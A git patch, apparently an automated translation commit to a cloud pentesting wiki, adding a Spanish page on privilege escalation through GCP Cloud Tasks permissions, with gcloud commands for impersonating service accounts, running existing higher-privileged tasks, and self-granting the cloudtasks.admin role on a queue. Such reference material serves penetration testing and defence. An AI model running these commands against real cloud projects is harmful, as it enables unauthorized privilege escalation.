From 269a5692c622e23ba46761819c9b9ba3da35c9eb Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 18 Aug 2025 14:25:40 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/gcp-security/gcp-privilege-escalation/ --- src/SUMMARY.md | 1 + .../gcp-cloudtasks-privesc.md | 45 +++++++++++++++++++ 2 files changed, 46 insertions(+) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 66a6a8fd8..7e7cc6609 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -107,6 +107,7 @@ - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Cloud Tasks Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md) - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md new file mode 100644 index 000000000..89c10eb15 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md @@ -0,0 +1,45 @@ +# GCP - Cloud Tasks Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Tasks + +### `cloudtasks.tasks.create`, `iam.serviceAccounts.actAs` + +Un atacante con estos permisos puede **suplantar otras cuentas de servicio** al crear tareas que se ejecutan con la identidad de la cuenta de servicio especificada. Esto permite enviar **solicitudes HTTP autenticadas a servicios de Cloud Run o Cloud Functions protegidos por IAM**. +```bash +gcloud tasks create-http-task \ +task-$(date '+%Y%m%d%H%M%S') \ +--location us-central1 \ +--queue \ +--url 'https://.us-central1.run.app' \ +--method POST \ +--header 'X-Hello: world' \ +--body-content '{"hello":"world"}' \ +--oidc-service-account-email @.iam.gserviceaccount.com +``` +### `cloudtasks.tasks.run`, `cloudtasks.tasks.list` + +Un atacante con estos permisos puede **ejecutar tareas programadas existentes** sin tener permisos sobre la cuenta de servicio asociada con la tarea. Esto permite ejecutar tareas que fueron creadas previamente con cuentas de servicio de mayor privilegio. +```bash +gcloud tasks run projects//locations/us-central1/queues//tasks/ +``` +El principal que ejecuta este comando **no necesita el permiso `iam.serviceAccounts.actAs`** en la cuenta de servicio de la tarea. Sin embargo, esto solo permite ejecutar tareas existentes; no otorga la capacidad de crear o modificar tareas. + +### `cloudtasks.queues.setIamPolicy` + +Un atacante con este permiso puede **otorgarse a sí mismo u otros principales roles de Cloud Tasks** en colas específicas, lo que podría escalar a `roles/cloudtasks.admin`, que incluye la capacidad de crear y ejecutar tareas. +```bash +gcloud tasks queues add-iam-policy-binding \ + \ +--location us-central1 \ +--member serviceAccount:@.iam.gserviceaccount.com \ +--role roles/cloudtasks.admin +``` +Esto permite al atacante otorgar permisos de administrador completos de Cloud Tasks en la cola a cualquier cuenta de servicio que controlen. + +## Referencias + +- [Google Cloud Tasks Documentation](https://cloud.google.com/tasks/docs) + +{{#include ../../../banners/hacktricks-training.md}}